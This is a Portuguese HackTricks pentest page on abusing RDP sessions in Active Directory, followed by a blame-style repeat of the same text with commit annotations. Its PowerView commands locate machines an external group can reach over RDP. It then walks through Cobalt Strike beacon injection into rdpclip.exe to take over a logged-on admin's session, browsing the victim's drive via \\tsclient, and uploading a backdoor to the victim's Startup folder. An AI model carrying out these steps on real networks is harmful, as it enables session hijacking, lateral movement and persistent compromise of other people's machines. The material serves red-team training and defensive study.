hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

# Abuso de Sessões RDP

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}

## Injeção de Processo RDP

Se o **grupo externo** tiver **acesso RDP** a qualquer **computador** no domínio atual, um **atacante** pode **comprometer esse computador e esperar por ele**.

Uma vez que esse usuário tenha acessado via RDP, o **atacante pode pivotar para a sessão desse usuário** e abusar de suas permissões no domínio externo.
```powershell
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
```
Verifique **outras maneiras de roubar sessões com outras ferramentas** [**nesta página.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)

## RDPInception

Se um usuário acessar via **RDP em uma máquina** onde um **atacante** está **aguardando** por ele, o atacante poderá **injetar um beacon na sessão RDP do usuário** e se a **vítima montou seu drive** ao acessar via RDP, o **atacante poderia acessá-lo**.

Nesse caso, você poderia apenas **comprometer** o **computador original** da **vítima** escrevendo um **backdoor** na **pasta de inicialização**.
```powershell
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

Size     Type    Last Modified         Name
----     ----    -------------         ----
dir     02/10/2021 04:11:30   $Recycle.Bin
dir     02/10/2021 03:23:44   Boot
dir     02/20/2021 10:15:23   Config.Msi
dir     10/18/2016 01:59:39   Documents and Settings
[...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporte o HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00			`# Abuso de Sessões RDP`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<details>`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<summary>Support HackTricks</summary>`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% endhint %}`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00			`## Injeção de Processo RDP`

Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`Se o grupo externo tiver acesso RDP a qualquer computador no domínio atual, um atacante pode comprometer esse computador e esperar por ele.`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`Uma vez que esse usuário tenha acessado via RDP, o atacante pode pivotar para a sessão desse usuário e abusar de suas permissões no domínio externo.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00			```powershell
			`# Supposing the group "External Users" has RDP access in the current domain`
			`## lets find where they could access`
			`## The easiest way would be with bloodhound, but you could also run:`
			`Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" \| select -expand ComputerName`
			`#or`
			`Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" \| select -expand ComputerName`

			`# Then, compromise the listed machines, and wait til someone from the external domain logs in:`
			`net logons`
			`Logged on users at \\localhost:`
			`EXT\super.admin`

			`# With cobalt strike you could just inject a beacon inside of the RDP process`
			`beacon> ps`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00			`PID PPID Name Arch Session User`
			`--- ---- ---- ---- ------- -----`
			`...`
			`4960 1012 rdpclip.exe x64 3 EXT\super.admin`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`beacon> inject 4960 x64 tcp-local`
			`## From that beacon you can just run powerview modules interacting with the external domain as that user`
			```
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 01:28:17 +00:00			`Verifique outras maneiras de roubar sessões com outras ferramentas [nesta página.](../../network-services-pentesting/pentesting-rdp.md#session-stealing)`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`## RDPInception`

Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`Se um usuário acessar via RDP em uma máquina onde um atacante está aguardando por ele, o atacante poderá injetar um beacon na sessão RDP do usuário e se a vítima montou seu drive ao acessar via RDP, o atacante poderia acessá-lo.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`Nesse caso, você poderia apenas comprometer o computador original da vítima escrevendo um backdoor na pasta de inicialização.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00			```powershell
			`# Wait til someone logs in:`
			`net logons`
			`Logged on users at \\localhost:`
			`EXT\super.admin`

			`# With cobalt strike you could just inject a beacon inside of the RDP process`
			`beacon> ps`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00			`PID PPID Name Arch Session User`
			`--- ---- ---- ---- ------- -----`
			`...`
			`4960 1012 rdpclip.exe x64 3 EXT\super.admin`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`beacon> inject 4960 x64 tcp-local`

			`# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.`
			`## \\tsclient\c is the C: drive on the origin machine of the RDP session`
			`beacon> ls \\tsclient\c`

Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-10 01:31:16 +00:00			`Size Type Last Modified Name`
			`---- ---- ------------- ----`
			`dir 02/10/2021 04:11:30 $Recycle.Bin`
			`dir 02/10/2021 03:23:44 Boot`
			`dir 02/20/2021 10:15:23 Config.Msi`
			`dir 10/18/2016 01:59:39 Documents and Settings`
			`[...]`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`# Upload backdoor to startup folder`
			`beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`
			`beacon> upload C:\Payloads\pivot.exe`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<details>`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<summary>Supporte o HackTricks</summary>`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% endhint %}`